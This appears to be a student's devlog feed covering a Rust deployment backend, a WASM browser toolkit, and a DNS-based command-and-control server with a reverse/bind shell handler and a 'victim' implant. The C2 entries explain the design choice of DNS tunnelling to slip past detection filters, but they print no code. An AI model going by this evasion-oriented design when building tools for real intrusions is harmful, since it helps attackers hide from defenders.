Activity

anderson

Now I tried if writing the implant application would be viable in C or C++, due to the difficulties in nostd rust with udp sockets

Attachment
0
anderson

Now I created a table for the DNS records in the database, created a configuration file, merged everything. I made a script that automatically runs cargo fmt.

Attachment
0
anderson

Redo, again.

So previously I used the dns-server crate for DNS server, due to it’s simplicity (and efficiency). But sadly, it couldn’t meet my requirements, and wasn’t reliable enough to be approved by me. This was a mistake from me because I didn’t do much research. So I migrated to hickory-proto and a normal UDP socket. This might change in the future, because hickory-proto for some reason added around 300KB of libraries that I frankly, don’t need for some parsing. Either way, I also removed the prototype DNS client from the implant, as I deemed it to be unethical and potentially insecure to have code that you don’t understand in your codebase, so I’ll rewrite that in the near future.

Other than that, I added a database and encryption keypair. This will be used later, but at the moment is kinda useless.
Summary:

  • Rewrite DNS logic for server (again)
  • Work on the implant
  • Add encryption and database logic
Attachment
0
anderson

Full remake, start

Hello. I thought, why are C2 data usually transmitted over DNS? Turns out, detection and response systems usually doesn’t have as strict filtering rules for that. You can also in a way “proxy” the information, or more technical, the recursive DNS resolver resolves to your nameserver and returns any potential information.

So, this time, I completely scrapped my previous attempt on the server (though the client might be reused) and started writing it for DNS instead. This time, I’ve also started writing the client/victim payload.

All programs are currently written in rust for security, but the client is in unsafe rust.

See https://github.com/a-rvid/tuxmux/tree/dns branch.

The plan is to use encryption to hide the data between clients and analysts.

Attachment
0
anderson

Optimization, commands

Temporarily disabled client connection (you’ll be able to listen with :l command and connect to BIND with :b later). I optimized the Cargo.toml file for binary filesize. I added a notification and MOTD system (with MOTD being the “welcome message” displayed).

Attachment
0
anderson

So I had this idea one day that I would write a terminal multiplexer, such as tmux, because I’m too bad at using tmux (meaning I’m too lazy to change the bindings). So I started on a base, see these commits:

  • pty start implementation
  • base
    They were fine and all. But you always want something more, so instead of writing a terminal multiplexer, I started on a reverse/bind shell handler, you could call it a C2 server. Today I created a server which listens for incoming connections at a specified port and connects to bind shells. A client using ratatui, and connect it all up with a UNIX socket.
Attachment
0
anderson

Shipped this project!

Hours: 28.42
Cookies: 🍪 96
Multiplier: 3.39 cookies/hr

This was a quite larger project than I thought, though I’m glad I had esse’s help (https://flavortown.hackclub.com/projects/15826), so that we could make something great together.

I’m really proud that I managed to build my own libraries based of WebAssembly/rust, as I hadn’t dabbled with WASM at all earlier. It’s also pretty cool how well styled it is, and the swift navigation. Styling is probably the most difficult thing for me, so I offloaded that to esse so I could focus on what I like most, low-level technical stuff.

anderson

We’ve done some final touches on the project, and it’s finally coming together pretty nicely. While it’s in a finalized used state, there are tons of more features to add in the future.

Attachment
0
anderson

Shipped this project!

Hours: 4.76
Cookies: 🍪 88
Multiplier: 18.42 cookies/hr

Publish Site v2: Improved stability since last release. Previously it was too unstable and too much dynamic configuration to manage so that it was unreliable. But right now it’s almost as simple as GitHub Actions! Start a docker container, run a script, open a port and BAM! Supercharge your workflows with this.

I had a hard time figuring out the proper solutions to my problems, but I did!

anderson

Publish Site workflow, version 2

Transitioning from version one to two, I’ve made major changes regarding security (confidentiality, integrity), availability, usability (ease of setup), stability and features.

PHP

I’ve added another docker image dedicated to “php”, that adds PHP support seamlessly integrated into the container. It is very much optimized as usual

SSH?

Instead of using the previous HTTP backend I’ve switched to SSH to improve stability, security and ease of use. SSH only requires one config point for the backend and the client (GitHub Actions), a public key and a private key, generated seamlessly by my PKI script. The project is now as stable as it gets and really easy to configure! Time for you to publish a web application!

The old rust backend will be in a legacy unstable state, do not use it!

Attachment
0
anderson

Exif Reader

I read EXIF data from user uploaded file and put them as table. It’s written in rust and compiled to WASM. For some reason it appears that strings enclosed by “” is not being saved in the vector, so we’ll have to fix that

Attachment
0
anderson

Image conversion, DNS Lookup utility

One thing I’ve always wanted in the tools is a image converter, like PNG to AVIF, JPEG to webp etc.
Now, it’s finally done, and in a fairly simple and lightweight solution! I wrote it in rust, in a separate WebAssembly file to not slow down the other hash digest users. It’s about 1.3MB, which is a good size of package.
Most online converters use a backend that transcodes your files, however that’s bad for your privacy, and requires processing from the backend.
The few local online converters usually use imagemagick-wasm, however the binary size of that is about 14 MB, about 10x bigger than my binary.

I also wrote a DNS Lookup utility using Quad9 DoH!
We are still working on styling.

Attachment
Attachment
0
anderson

Patches, styling and WebAssembly using rust

Phew, we have continued on styling the website.

Previously hashing didn’t work for data in a specific size, however to increase hashing times and fix this issue I’ve rewritten it in Rust/WASM. This is working flawlessly, however I removed RIPEMD, SHA-224, SHA-384 as I deemed them unneccessary.

Attachment
Attachment
0
anderson

I’ve worked with these features today:

  • More hashes
  • Encoding and decoding
    I’ve also contributed to major improvements in the styling, but right now it is borked as we are moving to CSS grid to improve document layout. I also created the toolbar which took quite long time. My coworker helped with styling and continued on the unit conversion system. This means that we have these features so far:
  • Archive conversion
  • Unit conversion
  • Currency conversion
  • QR Code Generator
  • Hash computing
  • Encoder/decoder
Attachment
Attachment
0
anderson

Me and my coprogrammer started working on the project. I implemented a local archive converter that at the moment supports

  • tarball
  • tarball gzip
  • zip
    And I also made a publishment workflow that minimizes and publishes to github pages. My coprogrammer created the initial UI and is working on a unit converter. This is supposed to be a general purpose toolkit without advertisements and junk compared to other.
Attachment
0
anderson

Shipped this project!

Hours: 36.22
Cookies: 🍪 741
Multiplier: 20.46 cookies/hr

I built a stable deployment plugin/action to GitHub actions.
The backend is written in rust, and has 2 Docker images, Alpine and Debian, for both x86_64 and ARM! I use mTLS for authentication, and I proxy the backend through NGINX for security.
The most difficult part for me was the NGINX/docker configuration.
If you still don’t understand what my project does, you can look at the graph above, or my demo, or heck, even the code! Thanks to my seamless docker image and PKI script anyone should be able to deploy it.

To all data nerds out there, the Docker image is only 13.3 MB! Wow.

I’m proud I barely used any AI in this project. Have fun!

anderson

Patches

  • I’ve fixed vulnerabilities mostly related to the backend and published a v1 release on the action.
  • I also continued writing some documentation and the demo.
  • Proper termination handling and a init system for the container.
  • Docker/NGINX configuration environment variable for body size limit
  • Security policies on repo

Features

  • Minimal alpine image instead of Debian. You can still find the Debian docker image at debian tag.

To-Do

  • Implement streaming body processing (DoS risk) [HIGH]
  • Add optional features to container through configuration such as PHP [Low]
  • Replace .unwrap() with proper error handling [Mid]
  • Logging
  • Verification of server authenticity (confidentiality) [Mid]
Attachment
0
anderson

During this period of time, I’ve accomplished this:

  • Documentation system
  • Documentation
  • NGINX Request Limit (2000MB, not env var yet!!)
  • Various NGINX configuration trouble. This took a while

Writing documentation is boring, but it has to be done. You can find it at https://publish-site.rvid.eu/

Attachment
Attachment
Attachment
0
anderson

We are almost done, and I’ve came far enough to confidently make a demo, with the API being on here.

  • As you can see on this workflow, it works perfectly fine and as intended.
  • It maintains confidentiality, security BUT not integrity and non-repudiation yet… This is a huge problem with simple fixes!

I deployed this on my local server with docker compose:

services:
  deploy-server:
    environment:
      API_URL: api.publish-site.rvid.eu
      CLIENT_CA: >-
        [REDACTED]
    image: ghcr.io/publish-site/backend:latest
    ports:
      - '443:443'
    volumes:
      - /etc/certificates/pub.crt:/etc/nginx/ssl/fullchain.pem:ro
      - /etc/certificates/pub.key:/etc/nginx/ssl/privkey.pem:ro
      - /mnt/SSD/publish-site:/var/www/html # Persistence
Attachment
0
anderson

Phew… I’ve finally completed the difficult (but fun) part of the backend… Now, I mostly have docker/nginx configuration up ahead, and of course the actual workflow. I’ve successfully converted to Hyper and I use the Base64 crate, instead of the hacky and unreliable previous solution.
Instead of this:

  • Create temporary directory
  • Write Base64 to file using coreutils and bash
  • Open decoded file
  • Decompress
  • Untar
    We have:
  • Decode Base64, decode, untar
    in one go.

The API is in a working state, but at the moment insecure. I call the version: PRE-01-INSECURE

You feel so good when you’ve accomplished something on your own (:


Simple and seamless.

0
anderson

Cool! I’ve started rewriting the backend codebase to use the HTTP Library hyper! This will eventually make the application more stable and secure, and it will probably be able to handle larger and more requests. I also modified the docker building workflow, so now we have a docker container for all fellow ARM/Raspberry Pi lovers! party-algae

Attachment
Attachment
0
anderson

Ugh… Sometimes you just have bad luck when programming… I’ve been trying to fix this one single line, commit 34f7b4d832db0df3e47796c5543adbf6df62725c line 73 (https://github.com/publish-site/backend/blob/34f7b4d832db0df3e47796c5543adbf6df62725c/src/main.rs#L73) for an hour now. At this point, I plan on moving my backend to a lightweight web framework called hyper. I planned on using as few dependencies and crates as possible, however using the hyper web framework will likely make my program less susceptible to risks such as denial of service and RCE. I’d just need to rewrite the majority of the backend API, but it’ll be simpler.

Either way, I’ve still done some progress! I changed some entries in the docker container and made the example site contain links to relevant documentation.

Attachment
0
anderson

YAHOO! I’ve finally completed the write part of the program, where it takes the site.tar.gz and decompresses the archive into a target directory! This means that the project can technically be used at this point of time, however with no security/confidentiality at all. I also used the base64 command from GNU Coreutils which should be temporary… I tried using the base64 crate but it was difficult. I also need to implement automatic removal of the files, but that’s pretty simple.

0
anderson

Hello! For the last few hours I’ve worked on getting colors into my program, YAY! Of course it checks if it is interactive, so the potential docker logs doesn’t risk getting cluttered with ANSI. I also removed some annoying debugging stuff, so that’s good to have out of the way. I made the program print the user agent for logging purposes, I may include more stuff like content length and such. I also started creating a wiki for both the backend and action! This will make it easier for the user to spin up their server and workflow.

NOTE: I don’t know why, but no time got logged with my neovim. Switching to Code OSS temporarily (?)

0
anderson

Phew! This was a long one. I finally implemented the upload logic for the backend server, meaning that I can finally upload the actual files! There is a few rough edges on the actions workflow, and I still have a bunch of debugging lines on the backend, and it’s still not writing anything. Either way I’m getting closer to done. I’m gonna focus on the completion, so first the upload part, then the authentication part. Finally after that I’ll clean up. Wish me luck!

1

Comments

anderson
anderson 3 months ago

Also, the server never actually completes the request yet (:

anderson

I continued working on the backend side of this project, and made a docker image server to be deployed on the server. I implemented HTTPS by reverse-proxying through NGINX. The certs in the docker-compose file are intentionally left in the commit so you guys can check it out easier. Next steps are to create the actual frontend to be published to, and to initiate mTLS through nginx. Should be easy enough.

Attachment
0
anderson

Today I worked on the base actions workflow. The workflow is executing a script so far. Haven’t worked any on the “backend”. I also created a example workflow implementation.

Attachment
0